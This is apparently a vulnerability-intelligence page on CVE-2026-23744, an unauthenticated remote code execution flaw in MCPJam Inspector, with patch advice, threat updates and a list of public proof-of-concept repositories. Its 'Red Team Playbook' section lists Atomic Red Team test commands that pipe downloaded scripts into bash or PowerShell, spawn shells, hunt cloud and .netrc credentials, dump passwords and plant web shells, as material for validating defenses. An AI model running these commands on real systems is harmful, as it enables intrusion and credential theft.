CVE-2026-23744
Overview
This vulnerability is a remote code execution (RCE) caused by improper access control in MCPJam inspector versions 1.4.2 and earlier. The root cause is that the application listens on all network interfaces (0.0.0.0) by default instead of localhost (127.0.0.1), exposing an HTTP endpoint that triggers the installation of an MCP server without authentication or validation. This allows unauthenticated external users to invoke server installation routines remotely via crafted HTTP requests.
Vulnerability Description
MCPJam inspector is the local-first development platform for MCP servers. Versions 1.4.2 and earlier are vulnerable to remote code execution (RCE) vulnerability, which allows an attacker to send a crafted HTTP request that triggers the installation of an MCP server, leading to RCE. Since MCPJam inspector by default listens on 0.0.0.0 instead of 127.0.0.1, an attacker can trigger the RCE remotely via a simple HTTP request. Version 1.4.3 contains a patch.
Impact
An unauthenticated attacker with network access to the MCPJam inspector service can remotely execute arbitrary code by triggering the MCP server installation process. Since the service listens on all interfaces by default, exploitation does not require local access or user interaction. This can lead to full system compromise, data breach, or service disruption. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms that no privileges or user interaction are needed for exploitation.
Solution
Users should upgrade MCPJam inspector to version 1.4.3 or later, which includes a patch restricting the listening interface to localhost and implements authentication controls. Detailed remediation steps and patch information are available in the official GitHub advisory GHSA-232v-j27c-5pp6 and the associated commit e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a. No alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the MCPJam inspector poses a significant risk due to its nature as a remote code execution (RCE) flaw. This issue arises from the platform's default configuration, where it listens on all network interfaces (0.0.0.0) instead of being restricted to localhost (127.0.0.1). This misconfiguration allows an attacker to send a specially crafted HTTP request to the server, which can trigger the installation of an MCP server. Once the installation process is initiated, the attacker gains the ability to execute arbitrary code on the affected system, potentially leading to a full compromise of the server.
Exploitation of this vulnerability can occur through various attack vectors. An attacker could leverage network access to the MCPJam inspector, which may be exposed to the internet or an internal network. By sending a maliciously crafted HTTP request, the attacker can initiate the installation process without any authentication or authorization checks, as the default settings do not impose restrictions on incoming requests. This scenario can be particularly concerning in environments where the MCPJam inspector is deployed in a production setting, as it could allow for widespread exploitation if multiple instances are running.
The real-world impact of this vulnerability is substantial, especially for organizations that rely on the MCPJam inspector for local-first development. The ability to execute arbitrary code remotely can lead to data breaches, unauthorized access to sensitive information, and potential disruption of services. Businesses may face severe reputational damage, financial losses, and regulatory repercussions if sensitive data is compromised or if their systems are used to launch further attacks. Additionally, the high CVSS score of 9.8 indicates that this vulnerability is critical and should be prioritized for immediate remediation.
To detect and mitigate this vulnerability, organizations should first ensure that they are using the patched version of the MCPJam inspector (version 1.4.3 or later). Regularly updating software and applying security patches is a fundamental practice in cybersecurity hygiene. Furthermore, network segmentation should be implemented to limit access to the MCPJam inspector, ensuring that it is only reachable by trusted internal systems. Employing firewalls to restrict incoming traffic and monitoring network activity for unusual patterns can also help in identifying potential exploitation attempts. Organizations should conduct regular security assessments and penetration testing to evaluate their defenses against such vulnerabilities.
In conclusion, the remote code execution vulnerability in the MCPJam inspector represents a critical threat that can have far-reaching implications for affected organizations. By understanding the technical details, potential attack vectors, and real-world impacts, businesses can take proactive measures to protect their systems. Implementing robust detection and mitigation strategies, along with maintaining an up-to-date software environment, is essential for safeguarding against this and similar vulnerabilities in the future.
CSURFACE threat intelligence has identified a marked escalation in exploitation attempts targeting CVE-2026-23744, accompanied by the emergence of multiple new proof-of-concept exploits circulating on public repositories. Our telemetry indicates that adversaries are increasingly leveraging these tools to automate and scale remote code execution attacks against vulnerable MCPJam inspector instances. This expansion in the exploit landscape, coupled with a slight uptick in the EPSS score, signals growing attacker confidence and operational momentum. For defenders, this trend underscores an elevated risk of compromise, particularly in environments where MCPJam inspector remains unpatched or exposed to external networks. Consequently, the threat level associated with this vulnerability has intensified, reflecting a more active and accessible exploitation environment that demands heightened vigilance.
Update 2 — June 19, 2026
CSURFACE threat intelligence has detected a modest but consistent increase in exploitation attempts targeting CVE-2026-23744, accompanied by the emergence of additional publicly available proof-of-concept exploits. Our telemetry indicates that threat actors are refining and expanding their toolsets to automate attacks against vulnerable MCPJam inspector instances. The elevated EPSS score reflects growing attacker confidence and a broader operational footprint. This development is significant because it lowers the barrier for less sophisticated adversaries to conduct remote code execution attacks, increasing the likelihood of successful intrusions in environments where MCPJam inspector remains exposed and unpatched. Consequently, the threat level associated with this vulnerability has risen from elevated to high, underscoring the urgent need for defenders to maintain heightened situational awareness and prioritize mitigation efforts.
Update 3 — July 08, 2026
CSURFACE threat intelligence has identified the publication of a new ExploitDB entry for CVE-2026-23744, marking a critical shift in the exploit landscape. While telemetry indicates a significant reduction in detection activity, the availability of multiple new proof-of-concept exploits on public repositories has broadened the attack surface and lowered the technical barrier for adversaries. This development is particularly consequential given the vulnerability’s default exposure on all network interfaces, enabling remote exploitation without authentication. The stable EPSS score near the 0.98th percentile reflects persistent risk despite the decline in observed exploitation attempts, suggesting that threat actors may be refining their tactics or operating with greater stealth. Consequently, the threat level remains critical, with the expanded exploit toolkit increasing the likelihood of opportunistic attacks and complicating defensive postures for organizations that have not yet applied the patch.
Update 4 — July 17, 2026
CSURFACE threat intelligence has identified a marked escalation in exploitation activity targeting CVE-2026-23744, accompanied by a broadening of the exploit landscape with several new proof-of-concept tools publicly released. Our telemetry indicates a significant uptick in detection events, reflecting increased adversary engagement and likely testing or operational use of these exploits. The elevated EPSS score, now approaching the 0.44 range, underscores a growing likelihood of successful exploitation attempts in the wild. This evolution matters because the expanding availability of exploitation resources lowers the barrier to entry for less sophisticated threat actors, potentially accelerating opportunistic attacks against unpatched MCPJam inspector deployments. Consequently, the threat environment has intensified, warranting heightened vigilance as the risk of remote code execution incidents rises in both volume and sophistication.
Update 5 — July 25, 2026
CSURFACE threat intelligence has detected a marked escalation in exploitation activity targeting CVE-2026-23744, driven by the emergence of new proof-of-concept tools that have broadened the exploit landscape. Our telemetry indicates a sustained upward trend in detection events, reflecting increased attacker interest and operational attempts to leverage the unauthenticated remote code execution vulnerability in MCPJam inspector versions prior to 1.4.3. The EPSS score has inched higher, reinforcing the growing probability of successful exploitation in the wild. This evolution is significant because the proliferation of publicly available exploit code lowers technical barriers, enabling a wider range of threat actors—including less sophisticated opportunists—to mount attacks. Consequently, the threat level has intensified from elevated to high, underscoring an urgent need for defenders to prioritize monitoring and response efforts around this vulnerability.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Mcpjam | Inspector | All |
cpe:2.3:a:mcpjam:inspector:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| MCPJam Inspector - Remote Code Execution | Diamorphine | webapps | multiple | - | View |
GitHub PoCs (49)
| Repository | Author | Stars | Forks | Date | Link |
|---|---|---|---|---|---|
|
suljov/CVE-2026-23744-Remote-Code-Execution-POC
MCPJam inspector contains a remote code execution
|
suljov | 11 | 1 | 2026-03-21 | View |
|
boroeurnprach/CVE-2026-23744-PoC
CVE-2026-23744 - Versions 1.4.2 and earlier of MCPJam inspector are vulnerable to remote code execution (RCE). Because t...
|
boroeurnprach | 9 | 2 | 2026-01-20 | View |
|
ibreakthingsforaliving/CVE-2026-23744-PoC
CVE-2026-23744 - Versions 1.4.2 and earlier of MCPJam inspector are vulnerable to remote code execution (RCE). Because t...
|
ibreakthingsforaliving | 8 | 2 | 2026-01-20 | View |
|
CerberusMrXi/CVE-2026-23744-MCPJam-Exploit
A proof-of-concept exploit for CVE-2026-23744 - MCPJam Inspector Remote Code Execution (RCE) vulnerability. This tool de...
|
CerberusMrXi | 8 | 1 | 2026-07-14 | View |
|
thisisish/HTB-DevHub
CVE-2026-23744 RCE + Privilege Escalation
|
thisisish | 4 | 0 | 2026-05-31 | View |
|
luiskrnr/exploit-CVE-2026-23744
MCPJam Inspector is a local-first development platform for MCP servers. In versions 1.4.2 (and earlier), a RCE flaw lets...
|
luiskrnr | 3 | 0 | 2026-04-10 | View |
|
FrenzisRed/CVE-2026-23744
CVE-2026-23744 - MCPJam inspector Remote-Code-Execution: Proof Of Concept (POC
|
FrenzisRed | 3 | 0 | 2026-03-23 | View |
|
Mluex0/CVE-2026-23744-PoC
CVE-2026-23744 is an unauthenticated command injection in MCPJam Inspector ≤1.4.2 via /api/mcp/connect. This POC exploit...
|
Mluex0 | 2 | 0 | 2026-08-10 | View |
|
ozcanpng/CVE-2026-23744
CVE-2026-23744 MCPJam Inspector unauthenticated RCE PoC
|
ozcanpng | 1 | 0 | 2026-07-11 | View |
|
alisster00/CVE-2026-23744-RCE
This utility was created during research involving MCPJam v1.4.2. The application exposes an API endpoint that accepts a...
|
alisster00 | 1 | 0 | 2026-06-02 | View |
|
SrGinebras/CVE-2026-23744-RCE-for-MCPjam-inspector-v1.4.2
|
SrGinebras | 1 | 0 | 2026-05-31 | View |
|
SuriyaBoon/DevHub-HackTheBox-ss11
HTB Season 11 — DevHub Writeup Exploiting CVE-2026-23744 (MCPJam Inspector unauthenticated RCE via /api/mcp/connect) to...
|
SuriyaBoon | 1 | 0 | 2026-05-30 | View |
|
InzegoSec/CVE-2026-23744
Exploit to MCPJam Inspector <=1.4.2
|
InzegoSec | 1 | 0 | 2026-03-24 | View |
|
ctzisme/CVE-2026-23744
PoC for CVE-2026-23744, demonstrating an unauthenticated RCE in MCPJam Inspector (<= 1.4.2).
|
ctzisme | 1 | 0 | 2026-03-26 | View |
|
yassertioursi/htb-kobold-writeup
Hack The Box — Kobold writeup. Exploiting CVE-2026-23744 (MCPJam Inspector unauthenticated RCE) to gain initial access a...
|
yassertioursi | 1 | 0 | 2026-03-25 | View |
|
0xg00se/CVE-2026-23744-script
Exploit script for CVE-2026-23744
|
0xg00se | 1 | 0 | 2026-03-27 | View |
|
itsC1SCO/mcpjam-to-root
From MCPJam Inspector RCE to root — CVE-2026-23744, JupyterLab token disclosure, kernel execution, and OPSMCP privilege ...
|
itsC1SCO | 0 | 0 | 2026-08-23 | View |
|
sonnelon/CVE-2026-23744-PoC
The poc of CVE-2026-23744
|
sonnelon | 0 | 0 | 2026-08-10 | View |
|
nullRoot-Red/CVE-2026-23744
Proof-of-concept and offensive security research analyzing CVE-2026-23744 (MCPJam Inspector Unauthenticated RCE, Patched...
|
nullRoot-Red | 0 | 0 | 2026-07-23 | View |
|
0x77FSec/CVE-2026-23744
|
0x77FSec | 0 | 0 | 2026-07-10 | View |
|
diamorphine666/CVE-2026-23744-exploit
Exploit for MCPJam Inspector - Remote Code Execution (CVE-2026-23744)
|
diamorphine666 | 0 | 0 | 2026-07-04 | View |
|
timgad794/DevHub-HTB-Walkthrough
Hack The Box - DevHub Machine Walkthrough (Medium Linux, CVE-2026-23744, Chisel Tunneling, Jupyter, Root Privilege Escal...
|
timgad794 | 0 | 0 | 2026-06-28 | View |
|
daemoncibsec/mcpExec
POC for CVE-2026-23744 for a python revshell
|
daemoncibsec | 0 | 0 | 2026-06-22 | View |
|
rohit-sundar/cve-2026-23744
|
rohit-sundar | 0 | 0 | 2026-06-14 | View |
|
kennedy-aikohi/mcpjam-cve-2026-23744-validator
|
kennedy-aikohi | 0 | 0 | 2026-06-09 | View |
|
oryk0/CVE-2026-23744
CVE-2026-23744 Reverse shell
|
oryk0 | 0 | 0 | 2026-06-06 | View |
|
keeieb79/CVE-2026-23744-poc
cve-2026-23744 python exploit
|
keeieb79 | 0 | 0 | 2026-06-05 | View |
|
Dahalsamir/CVE-2026-23744-MCPJAM-RCE-exploit
This Python proof-of-concept targets a vulnerable MCP (Model Context Protocol) service exposed by the target application...
|
Dahalsamir | 0 | 0 | 2026-06-05 | View |
|
avivyap/CVE-2026-23744
CVE-2026-23744
|
avivyap | 0 | 0 | 2026-06-04 | View |
|
jf-gondim/mcp-pwn
PoC exploit for CVE-2026-23744 — unauthenticated RCE in MCPJam Inspector via unvalidated serverConfig command injection ...
|
jf-gondim | 0 | 0 | 2026-06-03 | View |
|
MrR0b0t19/CVE-2026-23744-PoC
|
MrR0b0t19 | 0 | 0 | 2026-06-02 | View |
|
TYehan/CVE-2026-23744
Proof of Concept exploit for CVE-2026-23744: Remote Code Execution vulnerability in MCPJam Inspector <= 1.4.2
|
TYehan | 0 | 0 | 2026-06-02 | View |
|
m2sousa/CVE-2026-23744
CVE-2026-23744 Proof-of-concept.
|
m2sousa | 0 | 0 | 2026-06-02 | View |
|
afifudinmtop/MCPJam-Inspector-1.4.2-Remote-Code-Execution-CVE-2026-23744
|
afifudinmtop | 0 | 0 | 2026-06-01 | View |
|
Least-Significant-Bit/CVE-2026-23744
Remote Code Execution in MCPJam 1.4.2 and older
|
Least-Significant-Bit | 0 | 0 | 2026-05-31 | View |
|
sbouabid-sec/CVE-2026-23744-POC
CVE-2026-23744 — Proof of concept exploit for an unauthenticated Remote Code Execution vulnerability in MCPJam Inspector...
|
sbouabid-sec | 0 | 0 | 2026-05-31 | View |
|
p1ctur3p3rf3ct/CVE-2026-23744
CVE-2026-23744 PoC
|
p1ctur3p3rf3ct | 0 | 0 | 2026-05-31 | View |
|
w3nch/CVE-2026-23744
CVE-2026-23744 - Versions 1.4.2 and earlier of MCPJam inspector
|
w3nch | 0 | 0 | 2026-05-30 | View |
|
ledksv/kobold
Kobold — HackTheBox Medium writeup: CVE-2026-23744, PrivateBin LFI, Docker group escape to root
|
ledksv | 0 | 0 | 2026-05-10 | View |
|
d0x-awrqxavc/CVE-2026-23744
|
d0x-awrqxavc | 0 | 0 | 2026-03-28 | View |
|
d0x-awrqxavc/CVE-2026-23744-HACKTHEBOX
|
d0x-awrqxavc | 0 | 0 | 2026-03-28 | View |
|
z4yd3/PoC-CVE-2026-23744
Remote Code Execution on MCPJam Inspector <= 1.4.2
|
z4yd3 | 0 | 0 | 2026-03-25 | View |
|
H1sok444/CVE-2026-23744-PoC
|
H1sok444 | 0 | 0 | 2026-03-22 | View |
|
rootdirective-sec/CVE-2026-23744-Lab
|
rootdirective-sec | 0 | 0 | 2026-02-16 | View |
|
CyLock11/CVE-2026-23744
CVE-2026-23744 - MCP Connect RCE via Unauthenticated Command Injection
|
CyLock11 | 0 | 0 | 2026-03-29 | View |
|
d3vn0mi/CVE-2026-23744-POC
Python PoC for CVE-2026-23744, unauthenticated RCE in MCP servers via the /api/mcp/connect serverConfig command field (d...
|
d3vn0mi | 0 | 0 | 2026-03-28 | View |
|
fcjaviergarcia/CVE-2026-23744-POC
Proof of Concept (PoC) exploit for CVE-2026-23744, a vulnerability affecting MCPJam Inspector that allows remote command...
|
fcjaviergarcia | 0 | 0 | 2026-03-27 | View |
|
AhmadF77/CVE-2026-23744
python script for exploiting CVE-2026-23744
|
AhmadF77 | 0 | 0 | 2026-03-27 | View |
|
fckoo/mcpjaminspector-unauth-rce
CVE-2026-23744 RCE in MCPJam inspector <= 1.4.2
|
fckoo | 0 | 0 | 2026-03-22 | View |
Threat Feed
32 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Proof-of-concept code is publicly available for this vulnerability
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (3)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2026-23744 |
| github.com |
GitHub CVE
x_refsource_CONFIRM
|
https://github.com/MCPJam/inspector/security/advisories/GHSA-232v-j27c-5pp6 |
| github.com |
GitHub CVE
x_refsource_MISC
|
https://github.com/MCPJam/inspector/commit/e6b9cf9d9e6c9cbec31493b1bdca3a1255fe3e7a |